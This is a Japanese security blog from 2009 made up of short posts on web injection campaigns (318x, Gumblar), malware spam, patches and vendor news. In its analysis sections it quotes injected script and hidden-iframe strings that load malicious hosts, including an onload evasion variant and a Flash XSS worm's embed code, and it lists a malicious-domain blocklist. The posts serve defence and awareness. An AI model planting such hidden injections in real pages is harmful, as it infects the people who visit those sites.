UnderForge of Lack

ユニセフ創立記念日 1946年、国連児童基金（ユニセフ）の前身である国連国際児童緊急基金が創立
百円玉記念日（日本） 1957年、百円硬貨が発行
胃腸の日 「胃に良い→いにいい（1211）」
国際山岳デー(International Mountain Day)

----------
318x
昨日、時間が無くて紹介しただけでしたが・・・
318x SQL Injection Claims 125,000+
＜script src=hXXp://318x●com＞
という新手？のインジェクションが急増中

318x●com から更に
aa1100●2288●org（ん？）
js●tongji●linezing●com （！？）
またか・・
今年の７月に f1y.in 系のインジェクションが発生したときのドメインですね。
IE 0day exploit domains (constantly updated) 2009-07-06
[972890] Microsoft Video ActiveX コントロールの脆弱性により、リモートでコードが実行される 2009.07.07
CVE-2008-0015
[MS09-032] ActiveX の Kill Bit の累積的なセキュリティ更新プログラム
で解決済み (７月の定例パッチ）

のはずですが？

SQL injection attack claims 132,000+
Observed exploits include:

• Integer overflow vulnerability in Adobe Flash Player, described in CVE-2007-0071
• MDAC ADODB.Connection ActiveX vulnerability described in MS07-009
• Microsoft Office Web Components vulnerabilities described in MS09-043
• Microsoft video ActiveX vulnerability described in MS09-032
• Internet Explorer Uninitialized Memory Corruption Vulnerability – MS09-002.

「これでもか！」ってくらい既知の脆弱性を突く攻撃ですね。

318x Compromises Bigger on Yahoo
増えてる殖えてるよ～・・・

a variant of Trojan 22/40 (55.00%)
どうしたっ MSE !?

※最近、見ず知らずの方のPCの調整を行う機会が増えましたが、Norton 2005やら、McAfee 2004やらのまま放置されているケースがちらほら散見されます。

----------
企業データ窃取経路
米の大手(No.2)電気通信事業会社、Verizon:VZが発表した、企業データの窃取経路のレポート：
Verizon Business Issues 2009 Supplemental Data Breach Report Profiling 15 Most Common Attacks
この14位に見慣れない用語があります。
RAM scraper:
A fairly new form of malware designed to capture data from volatile memory (RAM) within a system.
Scammers scrape RAM for bank card data
量販店などのPOSレジスタにマルウェアを仕込み、そのキーログを蒐集、バックドアから送信するというシロモノ・・・・

こんなもん、どうやってチェックするというんでしょうね？
※POSの多くが Windows NT/XPベースで動作しています。

企業データを狙う15の手口、Verizonが紹介

----------
クラウド！
”雲(AWS)”の中に潜んでいたゼウス
流行のキーワード「クラウド」から目が離せませんね！
IBMがクラウド！クラウド！連呼してるのに違和感を覚えているのは私だけでしょうか？

クラウドは企業よりウイルスが活用？
イヤな未来予想ですが、あたってるかも（苦笑）

なんと！中村正三郎氏はまだ活動されているのですね～

----------
Google vs ..?
Fighting fraud online: taking "Google Money" scammers to court
Google的な「見せしめ」が見てみたい（どのくらいの損害賠償が飛ぶんでしょう？）

Google Work At Home Scam
Minipost: Google v. Pacific WebWorks -- GarWarner
Go Google! Take these Spammers and Scammers off the Internet!
(笑）

Google、同社名を騙った詐欺会社を訴える
なんかコメントが違う方向に向いてる気もしないでもありませんが・・・

「Googleで在宅高収入」うたう詐欺業者、Googleが提訴

----------
Oh Facebook
最近、iPhoneのCMで "facebookで友人探し" というフレーズが出ていますが、Facebookの危険性なんかは周知されてるんでしょうか？
Facebook Password Reset Confirmation. Customer Support. (Malware)
こんなランチョンミ～トが飛んできます。

食べちゃだめですよ？
Facebook_Password_833fd.exe 20/41 (48.78%)

Facebookといえばこんな話も
記事毎のプライバシー：Facebookがプライバシー設定を改訂
Facebookの新しいプライバシー方式は大惨事の序曲
SNSとBlogの垣根が取り払われようとしています（あるいは、そういうことを意図しない世代が増えてきているのかも）

----------
Gumblar.x never sleep
AS:23816ってど～こだ？
keyword: "compromized"
みたまま Gumblar.x の感染サイトですね。
12/10(UTC)で大量に登録されています。

----------
あなぼこ

Zen Cart "url" Local File Inclusion Vulnerability 3
IMPORTANT Security Alert: Remove extra folders from your server after install
REMOVE THE FOLLOWING FOLDERS (and all the files inside them), TO MINIMIZE SECURITY RISKS:

Ruby "rb_str_justify()" Buffer Overflow Vulnerability 3
Update to version 1.9.1-p376.

Joomla JPhoto Component "id" SQL Injection Vulnerability 3
Input passed via the "id" parameter to index.php (when "option" is set to "com_jphoto" and "view" is set to "category") is not properly sanitised before being used in a SQL query.
Joomla Component com_jphoto SQL Injection Vulnerability - (id)
Edit the source code to ensure that input is properly sanitised.

----------
GNS

Potential risks of using Google's free DNS service?
The motivation for this post is that you should be aware how much information you give away to one particular company, while the service is 'free' you're paying a yet to be determined price.
全てを受け入れるのです（違）
しかし、本当にGoogleがMalicious Sideに堕ちてしまったら、きっと袋叩きに合う（すでにそうなってる？）気もしますね～
Googleが無料DNS「Google Public DNS」を提供
でも、指摘されていますが、楽天の AD4u のような仕組みは明らかに邪悪なものです（笑）

Your Privacyが破られたときに考えようかな・・

「ローカルでDNSサーバを立てた上で、8.8.8.8 に forward する

※それより、DNS収容サービスやってくれないかな？（笑）

----------
その他、落穂など

顧客情報がネットで閲覧可能に～JAくにびき/サイレックス/Digipri
ヒューマンエラーs

Scribble scrambled
最近あまり聞かなくなった Virut/Virux ファミリですが、聞かなくなっただけで巷間には出回っている様子・・・
Virus:Win32/Virut.BM [Microsoft]
見るだけでイヤになるビヘイビア・・・

Rebranded rogue claims to be McAfee Secure certified
McAfeeの証明書（らしきもの）が入った FakeAV・・

12/09 blocklist update
あぼ～ん

Video: Next Year in the Threat Webscape – Websense Security Labs Predictions for 2010
WebSenseのいつものビデオ（毎月楽しみなんです）

----------
| 1260475221 | B | [goog-black-hash 1.46297 update]
| 1260475202 | M | [goog-malware-hash 1.17804 update]
| 343544 | -2337(345881)
| 1101769 |
EoF

ホームビデオ記念日(ビデオ戦争)
おしぼりの日 (全国おしぼり協同組合連合会)
とらふぐの日

----------
don't update firefox (with Norton)

またやらかしてくれたようで・・
NIS2010のアップデートでアドオンが使用できなくなる問題が発生 -- Mozilla Flux
アドオンマネージャから個別のアドオンの設定画面を呼び出そうとすると処理が停止してしまうほか、アドオンを更新しても、再起動を促すメッセージは表示されるものの、通知バーが出ないのが特徴だ。とくに前者は、Firefox本体を終了してもウィンドウが残ってしまい、タスクマネージャでプロセスを消すことを余儀なくされる。不便なことおびただしい。

会社のPCに入れる前に気がついてよかった・・・
かといって脆弱性の残っていることが判っているバージョンを使い続けるわけにもいかず・・・セキュソフトの都合で脆弱性バージョンを使うってセキュソフトの存在意義が問われそうですね（苦笑）

Re: Norton Toolbar disappears after applying 17.1.0.14 patch
We don't have a firm ETA on the fix right now.
NO ETA™
あと、こんなのも起きてる様子・・・
Unable to launch Microsoft Outlook after applying 17.1.0.14 patch
but I cannot get Outlook to open at all. I get a message "Cannot start Microsoft Outlook. Cannot open the Outlook window." I do a lot of my small business work by e-mail, so this is fairly serious.

会社のNorton信奉もそろそろ何とかしたい・・・

----------
BlackBerryからの会話はすべて聞かせてもらった！

ガラッ！って効果音が必要だったかな？
BlackBerry PhoneSnoop Application Used to Spy on Users
US-CERT is aware of public reports of a new software application called PhoneSnoop. This software allows an attacker to call a user's BlackBerry and listen to personal conversations. In order to install and setup the PhoneSnoop application, attackers must have physical access to the user's device or convince a user to install PhoneSnoop.

US-CERT warns about BlackBerry spyware app
PhoneSnoop – Turn a BlackBerry into a portable bug

BlackBerryの盗聴アプリ「PhoneSnoop」に要注意
RIM、BlackBerryの盗聴アプリに見解
RIMが調査したところ、PhoneSnoopは特定の電話番号からの着信で起動し、端末を盗聴デバイスに変えてしまうことが分かった。盗聴できるのは端末での通話内容ではなく、端末の周囲の音声であるといい、端末にセキュリティホールが存在するわけではないと説明している。
実際に盗聴するには、US-CERTが解説しているように標的となるユーザーの端末へPhoneSnoopを直接インストールする必要があり、攻撃手法の難易度は極めて高いという。

とりあえずは、端末の物理的操作が必要なようですが、BlackBerryユーザは自分の端末（あるいは会社の支給品）にどんなアプリがインストールされているか把握する必要があるということでしょう。
※上司が盗聴してるかも？とか考えるとちょっと怖い・笑

----------
Cisco to Acquire ScanSafe

Cisco Announces Intent to Acquire ScanSafe
SAN JOSE, Calif. – Oct. 27, 2009 – Cisco today announced its intent to acquire privately held ScanSafe, Inc.
お～
これは予想していなかった買収です。
Gumblarなどの解析結果は今後はCiscoから出されるのかな？（笑）

ともあれ、「おめでとうございます」。ということにしておきましょう。
Cisco、Webセキュリティ企業のScanSafeを1億8300万ドルで買収

----------
Gumblar calm down

Adobe Reader / Acrobatを狙う攻撃が減少【Tokyo SOC Report】
現在のところ鎮静化傾向にありますが、改ざんされたままのWebサイトもあるので、依然として注意が必要です。クライアントPCでご利用のアプリケーションを最新のバージョンへアップデートすることをご検討ください。

穿った見方をすれば、「目的は達したので戦略的撤退」を果たしただけかもしれません。何しろ５月末から今までずっと潜伏し、網を張っていた組織ですので・・・
この手の犯罪に憶測は禁物ですが。

被害とその実態および回復
新種の「Gumblar」PHPウイルスがはやっています
【警告】新種の「Gumblar」PHPウイルスの猛威　そのメカニズム
「やられ群」１・２・３の組み合わせがねずみ講を連想してしまうのは私だけ？（笑）
想像ですが、やられ群１と２に関しては、旧Gumblarによって盗まれたFTP Credential(s)の中から無作為に抽出したものではないか？と考えています。特に１群にはバーチャルホストに収容されているレンタルサーバを狙っている節があり、対策が難しい点を悪用しているような気がします。（ISPが実稼動機を停止できないため、ISPが各個にユーザへの感染確認などを行うハメになってしまい、結果的に時間稼ぎをされてしまう）

----------
iFrameインジェクションの進化

Evolution of Hidden Iframes

iframeを隠す手段としてよく使われているのが
＜iframe src="hxxp://gumblar .cn/ count.php?o=1" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no＞＜/iframe＞
のように visible 属性を none にしたり、 style属性を hidden にしたりする手法です。あるいは、＜div style="display:none"＞のように、直前のdivブロックを非表示にすることもよく目にします。

今回新しく発見された手法は
＜iframe frameborder="0" onload="if (!this.src){ this.src='hxxp://gumblar .cn/ index.php'; this.height='0'; this.width='0';}" ＞dvexgqoexlsvajdiodgqvxswnifzmxo＜/iframe＞
onloadを使って、検出パターンから逃れようとしています。
インジェクション onload属性の利用

----------
DAY -27- Active Directory Ports

137 138 139 および 445 を外部に出し・外部から応答にしている方はさすがに減ったのではないか？とは思っていますが・・・・
Cyber Security Awareness Month - Day 27 - Active Directory Ports
他にも沢山使っています。

こうした Windowsサービスで使用されているポートのトラフィックは VPNを使っているのであればそのトンネルのみを許可、それ以外であれば基本的にはルータ・ファイアウォールでブロックしておいたほうが無難でしょう。
第4回　ネットワーク・セキュリティを実現する「Windowsファイアウォール」 -- 2005.06
もっとも、VPNを経由したADは、細切れになったファイルの転送が激しく遅いという NetBIOSの特徴で、使い物にならないほど速度が低下することがありますが・・・

----------
DAY -28- NTP 123UDP

Cyber Security Awareness Month - Day 28 - ntp (123/udp)

ケルベロス認証は使ってませんが、同期がときどき日単位で狂うことはありますね（苦笑）たぶん、何かの設定がおかしいのでしょうけど、放置していたら怒られそうなので同期頻度を上げたことはあります。

あと time_t()の2036/2038年問題なんかもあったような・・

----------
時間切れ

Google Safe Browsing STATUS:
サーバ堕ちてる（泣）

本日帰社予定～
EoF

きのこの日
日本特用林産振興会が制定
たすけあいの日
社会福祉法人 全国社会福祉協議会(全社協)が制定
ぞうりの日
草履興業組合が制定（となっていますが、詳細はみあたらず・・）

----------
品質向上のための移行期間

Adobe Reader 9.2 がようやく直接ダウンロード可能になっているようです。

最新バージョンのAdobe Readerのダウンロード

結城さま、情報＆いつも添削ありがとうございます m(_ _)m

追記：
Herr Katze様から、ダウンロードセンターからも 9.2 が直接ダウンロードできるようになっているとの報告をいただきました。
感謝です。

なんとなく、update = 26.7MB というサイズが変な気もするのはきっとキノセイでしょう。（昨日の、ヘルプからダウンロードした際には 50MB強のパッチでした。

----------
Unknown Threats
[予防警戒]
以前、Gumblar/GENO のときに色々とお世話になりました「さまれぼ！」の管理人様から不審なインジェクションの報告がありましたので調査してみました。

スクリプト的には
"d27cdb6e-ae6d-11cf-96b8-444553540000"オブジェクトタグを使った flash コードのように見受けられますが、
hXXp://ocasa. ro/media/offline.php?s=RUiD9MP&id=3
のように、末尾の id=数字を延々と変更してスクリプトを再帰呼び出ししています。

このケースでは id=13 のときに
iexplore.exe -- 2009.10.14 10/41 (24.39%)
をダウンロードさせようとしています。

同様のケースで
ppl-14 .ru
の場合
wJQs.ex -- 2009.10.14 11/41 (26.83%)
となっており、いずれも高い検出率ではありません。

ちなみに、NOD32が Daonol.Fの亜種だとしていますが、この Win32/Daonol は、狭義のGumblarウィルス(zlkon/gumblar/martuz)の名称で、最終型(Martuz.cn)が Daonol.F とされています。

martuz.cnの終焉があまりにも素早かったため、何らかの意図があって一時的に引いたものとも推測されていましたので、ひょっとしたらまた再開するつもりなのかもしれません。

ocasa.ro = 89.42.216.56 収容ドメイン 320 （！？）
SC ROMARG SRL -- AS5606 KQRO GTS Telecom SRL Bucharest ROMANIA
Malicious 判定 :
　lamatache.ro
過去履歴有り :
　groupromo.ro

ppl-14.ru = 78.110.52.219 収容ドメイン : 30
Hosting Telesystems network -- AS31240 OLD-HT-SYSTEMS-AS JSC
全スルー

albaser.com = 69.64.156.62 収容ドメイン : 159
eNom, Incorporated -- AS21740 DemandMedia AS DemandMedia
Malicious 判定 :
　estilointeriors.com
　plavariba.com
　jg.ae
　obsgroup.com
過去履歴有り :
　brokenfoundation.com
　presottome.com

他にも増えそうな雰囲気です。

----------
今日は解析に手間食ったので、残りはサラっと（笑）

----------
脆弱性悪用のドライブ・バイ・ダウンロード

ちょうど、タイムリーな記事が出ていました
大規模なWebサイト改ざんとゼロデイ攻撃：危険な組み合わせ

----------
Zeusの攻撃が続いています

「SSL証明書を更新してください」、新たなウイルスメール出現
New variation of SSL Spam

Tailor-Made ZBOT Spam Campaign Targets Various Companies
The email posed as a notification from the company’s “system administrator,” reminding the employee to update his/her system’s software due to a recent server software upgrade.
Personalized Patch/Update Spam Delivering Malware

Zeusとの関係性が指摘されている Bredlabの解析
Taking a Closer Look at Trojan.Bredolab

とりあえず、怪しげなSSL更新やソフトウェア・アップデート、保守期間切れ及び更新を促すメールが着たら、送り主を３回くらいチェックしましょうネ（笑）

----------
ログが落とせない

Odd Apache/MSIE issue with downloads from ISC
Users who download our log submission client using Internet Explorer frequently receive truncated files. Firefox appears to download them fine. In either case, the server logs a "200" status and the file size in our Apache access log is correct (about 2.2 MBytes). However, the users only receives 200-300kBytes. A packet capture confirms that only 200-300kBytes got transfered. As MSIE starts the download, it does display the correct file size (and the content-length header is correct)
DShieldのログが、Apache環境下でリモートからMSIEを使うと変なサイズになってしまうというお話。
Firefoxでは大丈夫・・なのかな？

----------
Day14 - Port 514 syslogd

Cyber Security Awareness Month - Day 14 - port 514 - syslog
There are 3 main syslog packages at this time:
syslog
syslog-ng
rsyslog

そういえば、Windows Serverの syslogってあまり見ませんね・・・（みてもわかんないし！）

----------
Spammer also loves Obama

Obama Nobel Prize Spam Links to Malware and Drive-By
Blackhat SEO Campaign Targets 2009 Nobel Prize Winner

何でもMalwareの時代ですので・・

----------
見て！見て！　マルウェアだよ

Show Me the Malware!
As part of Cyber Security Awareness Month, we're highlighting cyber security tips and features to help ensure you're taking the necessary steps to protect your computer, website, and personal information.
Google検索で、GSBと連動してマルウェアの内容などを Tips表示する模様

Google highlights malicious code

陥落サイトのオーナは、かなり恥ずかしい気分を味わうことになるのでしょうか・・・

----------
Firefox プラグインアップデート・ガイドが正式運用

Mozilla Plugin Check Now Live
とりあえずは評価しましょう～

あとは、Adobeのようないい加減なバージョン管理を行っているとこが、混乱を避ける方向に進んでくれることを期待しましょう（苦笑）

----------
Google.Com内のマルウェア配布サイト？

gotaskscan.com
逆引き: gw-in-f100.google.com
gotaskscan.com

情報収集中・・

----------
Google Safe Browsing STATUS:
[goog-malware-hash 1.16446 update]
[goog-black-hash 1.42198 update]
Results: 338853 (+16534)
Logged Total: 781436 (+13212)

EoF

IRCとMailで指摘を受けてごそごそ調査していましたが、裏取りが終わりましたのでちょっとレポ

某タレントのBlogが攻撃を受けているという情報が飛び交い始めたのが 9/18 頃の話で、キャッシュを探したのですが、見つけられませんでした。
しかし、中国の悪名高い Baidu-Spiderのキャッシュに
＜iframe src="hXXp://soul-of-man.ru:8080:8080/ts/in.cgi?sony" width=650 height=0 style="visibility: hidden"＞＜/iframe＞
という文字列が残されていました。

なんで8080を二重に設定してるのかは謎ですが、同様のインジェクションは他にも見つかりますので、恐らく自動で差し込まれたものでしょう。
あと、sony ってのも謎ですね（笑）

IP:

80.69.74.73		TransIP B.V
85.17.237.5		LEASEWEB
91.121.7.26		OVH ISP Paris
91.121.121.6
91.121.134.229

TranceIPは新顔ですね

既に何度も紹介しているように、汚染の手口は旧態依然のものです。
Microsoft(Windows) Update
Adobe (Acrobat) Reader
Adobe Flash Player
Mozilla Firefox
を常に最新にしておけば感染することはありません。

この攻撃が本当に Gumblar/GENO のものなのかどうかは確証がありませんが、8080インジェクションが同じグループに関係が深いことは様々なセキュリティ機関が指摘しています。
個人的な感想を言えば Gumblarのような緻密さが感じられないのですが・・・
※難読化も分割も行っていないストレートな方法です。

IP 80.69.74.73 収容のドメイン群・・・
収容されているIP群はおなじみのものも多数存在します。

18-plus.ru	not yet	THROUGH
39u.ru	638	BLOCKED
3b4.ru	96	BLOCKED
3bf.ru	561	BLOCKED
3cw.ru	437	BLOCKED
80-69-74-73.colo.transip.net	not yet	THROUGH
a5h.ru	295	BLOCKED
a5i.at	17	BLOCKED
age-bio.ru	1094	BLOCKED
age-inf.ru	not yet	THROUGH
autobestwestern.cn	90days ago	BLOCKED
beachhousename.cn	747	BLOCKED
bestfindit.cn	90days ago	BLOCKED
betworldwager.cn	89	BLOCKED
bigtopcabaret.cn	90days ago	BLOCKED
bigtopcreative.cn	546	BLOCKED
bigtopfestival.cn	84	BLOCKED
bigtopliteworld.cn	90days ago	BLOCKED
bigtoplotto.cn	205	BLOCKED
bigtopstudios.cn	452	BLOCKED
bio-a.ru	0(benign)	THROUGH
bio-age.ru	not yet	THROUGH
c1z.at	587	BLOCKED
c8k.ru	312	BLOCKED
c8t.ru	not yet	BLOCKED
casinoslotbet.cn	488	BLOCKED
ce5.ru	254	BLOCKED
ciqx.in	465	BLOCKED
coolnamemart.cn	581	BLOCKED
dima-bilan-gey.ru	not yet	THROUGH
dub-dubom.ru	not yet	THROUGH
f6e.ru	201	BLOCKED
findbigthinker.cn	90days ago	BLOCKED
gasa.in	4	BLOCKED
giantbest.cn	201	BLOCKED
giantnonfat.cn	90days ago	BLOCKED
hugetopnonfat.cn	183	BLOCKED
inhouselabel.cn	30	BLOCKED
iq-mozgi.ru	not yet	THROUGH
liteautorepair.cn	90days ago	BLOCKED
litefinestdirect.cn	94	BLOCKED
litetopfindguide.cn	746	BLOCKED
liteupyourride.cn	220	BLOCKED
lotmachinesguide.cn	445	BLOCKED
mixmediadirect.cn	428	BLOCKED
mybetsportswager.cn	347	BLOCKED
namecompanystore.cn	11	BLOCKED
nameshopinternational.cn	131	BLOCKED
namezeroshop.cn	377	BLOCKED
nonfathighestlocate.cn	349	BLOCKED
ns5.litetopdetect.cn	90days ago	BLOCKED
pornomig.ru	not yet	THROUGH
professional-test.ru	not yet	THROUGH
q0w.ru	308	BLOCKED
q3o.ru	183	BLOCKED
q5n.ru	90days ago	BLOCKED
rbgt.in	179	BLOCKED
russkitrax.ru	not yet	THROUGH
shoppicturelife.cn	422	BLOCKED
superorgazm.ru	not yet	THROUGH
t-age.ru	not yet	THROUGH
test-health.ru	not yet	THROUGH
thehomename.cn	156	BLOCKED
u1x.ru	90	BLOCKED
u3h.ru	363	BLOCKED
u6v.ru	124	BLOCKED
u8v.ru	101	BLOCKED
ultralitecar.cn	424	BLOCKED
uppd.in	284	BLOCKED
www.inhouselabel.cn	30	BLOCKED
www.litecarfinestsite.cn	216	BLOCKED
www.u8r.ru	266	BLOCKED
www.xg8.ru	150	BLOCKED
x0c.ru	524	BLOCKED
x0v.ru	596	BLOCKED
x3a.ru	336	BLOCKED
x3b.ru	539	BLOCKED
x6h.ru	2	BLOCKED
x7d.ru	2349	BLOCKED
x8n.ru	1323	BLOCKED
x8y.ru	122	BLOCKED
x9d.ru	1	BLOCKED
x9f.ru	1494	BLOCKED
x9m.ru	579	BLOCKED
x9v.ru	112	BLOCKED
xb4.ru	90	BLOCKED
xc6.ru	113	BLOCKED
xg8.ru	150	BLOCKED
xj4.ru	143	BLOCKED
xq1.ru	90days ago	BLOCKED
xq8.ru	90days ago	BLOCKED
xv8.ru	90days ago	BLOCKED
xv9.ru	509	BLOCKED
yourlitetopfind.cn	90days ago	BLOCKED
zeyc.in	235	BLOCKED

9.11から８年
奉仕と追悼のための国民の日("Patriot Day and National Day of Service and Remembrance")

公衆電話の日
警察相談の日

----------
Spam Injection Spam Malware (*repeat endless)

Obama大統領のスピーチも
Healthcare Spam

ホワイトハウスのレポートも
Blackhat SEO Attack Targets Obama's Speech

G-20サミットも
And so it begins (again)

ダ・ヴィンチ・コードも
Da Vinci Code Fans Targeted By Real International Conspiracy

休日のレジャー案内も
Spam and Phishing Landscape: September 2009

中国の怪しげな薬品も
Chinese Pharmacy Spam and Our Monthly Spam Report

全てがマルウェアやらフィッシングやらに繋がっていきます。

重要なことは、

でしょうか？

----------
こんなメールが届いたらどうします？

World of Warcraft を運営する Blizzard社（らしきところ）からこんなメールが届いたらどうします？

Would you answer this email?
このメールは警告です。あなたのWoWアカウントが某所で販売されようとしていますが、その行為はEULAに違反しています。もしあなたに身に覚えのない状態でこの行為が発生しているとしたら、あなたのアカウントかどうかをチェックするために、以下の情報を入力し、返信してください（以下略）
from xxxxxx＠blizzarid.com

苦笑
----------
差出人が・・・

メール障害3902件発生、ソフトバンクモバイルとディズニーモバイルで8月に

受け取ったメールが、全く関係ない見知らぬ人のメアドというのはチョット怖いんですが？

----------
Firefox 3.5.3

Firefox 3.5 セキュリティアドバイザリ

最高	MFSA 2009-51	FeedWriter によるクローム特権昇格
低	MFSA 2009-50	過大な行高の Unicode 文字を通じたロケーションバーの偽装
最高	MFSA 2009-49	ツリー列のダングリングポインタ脆弱性
最高	MFSA 2009-47	メモリ破壊の形跡があるクラッシュ (rv:1.9.1.3/1.9.0.14)

現在もまだ 3.0x を使い続けている方は、このへん
Firefox 旧バージョンのダウンロード
からさがしてください。

尚、今回のバージョンから、Adobe Flash の旧バージョン使用中のユーザに対して警告が発生します。

Mozilla Releases Security Advisory

----------
SMB2 allows remote code?

SMB2の受諾応答Port 445 をWAN側に開放していると発生するらしい美しい青色画面ですが、Microsoftが確認したようで正式にアドバイザリが出されました。

SMB の脆弱性により、リモートでコードが実行される(975497)
うげ・・リモートコードですか？
と思った方、今回のSMB2に関しては BSoDによる DoS状態になるだけのようですが、可能性がゼロでは無いことも事実です。

Server2008等が狙われるとタイヘン危険ですので、対処を講じましょう。

VistaとServer 2008に新たな脆弱性、修正パッチは準備中
Microsoft Releases Security Advisory 975497
Microsoft Windows SRV2.SYS Remote Code Execution

Windows、「Teardrop攻撃」にさらされる
正式版「Windows 7」、SMB脆弱性の影響は受けず--MSが明らかに

Port445をDMZの外側から受け取れる環境というのがそもそも・・

----------
Apple Security Update(s)

QuickTime:
About the security content of QuickTime 7.6.4

OS:
About Security Update 2009-005
Product Security, Mac OS X Server 10.5, Mac OS X Server 10.4.x (Universal), Mac OS X Server 10.4.x (PowerPC), Mac OS X 10.5.8 , Mac OS X 10.4.11

iPhone/iPod Touch
About the security content of iPhone OS 3.1 and iPhone OS 3.1.1 for iPod touch

And Snow Leopard（もうupdate!?）
About the security content of the Mac OS X v10.6.1 Update

Apple Releases Security Updates
「ゼロデイのApple」の名前に戻らないように頑張っているようです

----------
Sep.18 2009まで待ってね

Update on RoboHelp Server 8 Issue

CVE-2009-3068
Unspecified vulnerability in Adobe RoboHelp Server 8 might allow remote attackers to execute arbitrary code via unknown vectors, as demonstrated by the vd_adobe module in VulnDisco Pack Professional 8.7 through 8.11, related to a "remote pre-authentication exploit."
まぁ、なんだかまだ実態不明の脆弱性のようですね

現在 RoboHelp ver8 を使用中の方は、9.18 まで待ってください。

----------
330,000 = Neg 7,035,000,000 ?

顧客情報流出による損失70億円超と試算、三菱UFJ証券

世の中には、絶対にやってはいけないことがあるんです

----------
BINGo!

ほーら、やっぱりBingはエッチ系検索エンジンだった！　（アップデートあり）
Microsoftの広報からの興ざめなアップデート：
われわれはかかる広告がBingに関連して表示された経緯についてGoogleに問い合わせを行っております。
問い合わせしてるのかYO!

----------
あー多かった・・

EoF

ナミビアの日
国連が制定した国際デーの一つ。(EN)
1990年3月に独立した、アフリカ南西部にあるナミビアの自立を援助する日。

ユースホステルの日
1909年にリヒャルト・シルマンが計画した遠足（８泊徒歩旅行）中、大雨に遭って小学校に避難宿泊した際に、若者が安全に宿泊できる施設の重要性を痛感、ユースホステルの運動を展開するきっかけとなった日。
今年は100周年に当たる

----------
Adobe's Security descent upon ground

Flash attack vectors (and worms)
Now, before digging into what this worm does, I'd like to point out how dangerous embedding SWF files can be. It is very common that authors put basic XSS protection into their programs (for example, preventing users from entering the tag), however, Flash files can also be dangerous – I've successfully used them during various penetration tests to evade web application firewalls (which are not the solution to bad coding!).

Back to the worm – the playswf() function creates the following object:

<embed src=”"+o.filename+”” type=”application/x-shockwave-flash”
“+”width=”"+(o.width||”320″)+”” height=”"+(o.height||”240″)+”” allowFullScreen=”true”
wmode=”"+(o.wmode||”transparent”)+”” allowScriptAccess=”always” ></embed>

The allowScriptAccess parameter controls the level of access to the local HTML page by the Flash object. By default, this parameter is set to "sameDomain", which means that a Flash object can only access the HTML page if it was retrieved from the same domain. In other words, by omitting this parameter the Flash attack vector would be effectively disabled since the attacker wasn't able to put the Flash file in the same domain as the main site.

However, by setting this parameter to "always", the Flash file can directly access any element of the local HTML page, including (you guess) cookies.

この allowScriptAccess が Always(Flash 7までは Alwaysがデフォルトだった）に設定されていると、ブラウザやWebアプリのファイアウィールを貫通して直接XSSができる、実にステキな機能です。
で、中国で有名（らしい・・学校系）なSNSが、自動で alwaysを設定する embedタグを生成していたので、この脆弱性によりCross Site Flashing (XSF)を仕掛けられ、あるいは CSRFが成功している模様です。

攻撃に使用された evil.js のホスティングに使用されている
o.99081.comは、つい先日、Small but important update -- DNS-BHのブラックリストに追加されています。
※日本国内の掲示板スパムにも使用されていますね。

218.28.188.240 as AS4837 China-Network(CNC Group)
収容ドメイン：Results for IP 218.28.188.240
Displaying items 1 to 100, out of a total of 184 多いよ・・

えーっと、回避はどうすればいいんでしょう・・（苦笑）
it didn't matter what version of Flash you were running since the code on the web site was vulnerable.

参照：
インジェクション -- FFXI(仮)

XSS worm targeting Chinese website
/ I’m not a malicious worm.^^;
いや・・十分Maliciousです・・

----------
TEH Botnets
知らないBotnetも出てきていますね

Ilomo:
All Your Info Are Belong to Us

Waledac:
Spammers broadcast it for FREE!
Waledac, Part 3: A Spammer, Downloader, and Infostealer—Among Other Things

ZeuS(Zbot):
Zeus, King of the Underground Crimeware Toolkits

Zeus系は最近おさまってたようにも思っていたのですが、そうでもなかったようです・・・

----------
その価値は500円ですか？

アミューズ、情報流出の恐れがある14万人に500円の商品券
芸能プロダクションのアミューズは8月25日、通信販売サイト「アスマート」に対する不正アクセス攻撃に関する経過について説明した。情報流出の可能性がある14万8680人を対象に、お詫びとして500円分のQUOカードを9月上旬から発送することを決めた。

クレカ情報の変更って大変なんだけどなぁ・・
しかし、運用してたテイパーズに損害賠償が跳ぶんでしょうね・・きっと

----------
Snow Leopard has Malware Protection

8/28発売の決まった 新MacOS X : Snow Leopard ですが、評判のほうはどうなんでしょう？
MacOS X 10.6 Snow Leopardの発売日、8/28に決定

でも、使われてるユキヒョウはちょっと目つきが悪い（笑）
かわいい仔はこんなかんじです

本題：
Apple - Mac OS X - Security - Keeps safe from viruses and malware
マルウェアプロテクション機能が装備された模様です。

Snow Leopard Contains an Antivirus
"install.pkg" will damage your computer, You should move it to the Trash
という感じで、既知のMalware(偽iWork)を検出した実証もレポートされています。

3300円のアップグレードが安いか高いかは難しいところですが、セキュリティパッチの遅いAppleは今後、10.5のサポートも遅延する可能性があることは念頭に入れなければならないでしょう（苦笑）

----------
Chrome Update (automatically as well)

Stable Update: Security fixes
Google Chrome 2.0.172.43 has been released to the Stable channel to fix the security issues.
２つの重要なセキュリティfixがはいりました。
もっとも、自動アップデートで既にパッチが当たっているとは思いますが

----------
WordPress WP-Syntax Plugin Code Execution Vulnerability

WordPress で ソースコードなどを参照表記する際、PREタグを GeSHi(Generic Syntax Highlighter)の表記規則に従って、表示してくれるプラグイン WP-Syntax にリモートコード実行可能な脆弱性が確認されました。

Wordpress Plugin WP-Syntax <= 0.9.1 Remote Command Execution PoC

インストールされている Plugin フォルダ内の "wp-syntax/test" directory を削除してください。

----------
IBM Lotus Notes Client

Potential security issue with Lotus Notes file viewer for Microsoft Excel
iDefense Labs contacted IBM Lotus to report a potential keyview buffer overflow vulnerability in Lotus Notes. In specific situations it was found that there is the possibility to execute arbitrary code.

Lotus Notesってまだあるのか！？　なんて思った方、意外とあったりするんですよ（笑）

Notes 8.5.x, 8.0x, and 7.x はアップデートが出されますが、6以下はライフサイクルが終わっていますので、Viewerを切るしかなさそうです。

----------
Massive Injection via China 続報

Potent Trojan Cocktail / SQL Injection May be Regionally Targeted
だいたい、ScanSafeが連続で報じるときはホントに激しいことになっていることが多いので気をつけましょう。

もっとも、
インジェクション　61.232.154.43のリファラーチェック -- 2009/08/08
にもあるように、リージョンチェックを行っており、いまのところ中国国内のみ（ゲームパスワード窃取？）ターゲットにしているようです。

----------
ゆだんしてると
休暇中にTwitter（ツイッター）を利用していたイスラエル・ハイマン氏が空き巣の被害に遭ってしまったようだ。ハイマン氏および夫人の居場所が絶え間なくアップデートされ、泥棒が余裕で犯行におよぶことが出来たため、ツイッターが非難されている。

苦笑
まぁ、訴訟に発展してないだけマシなのかな？（笑）
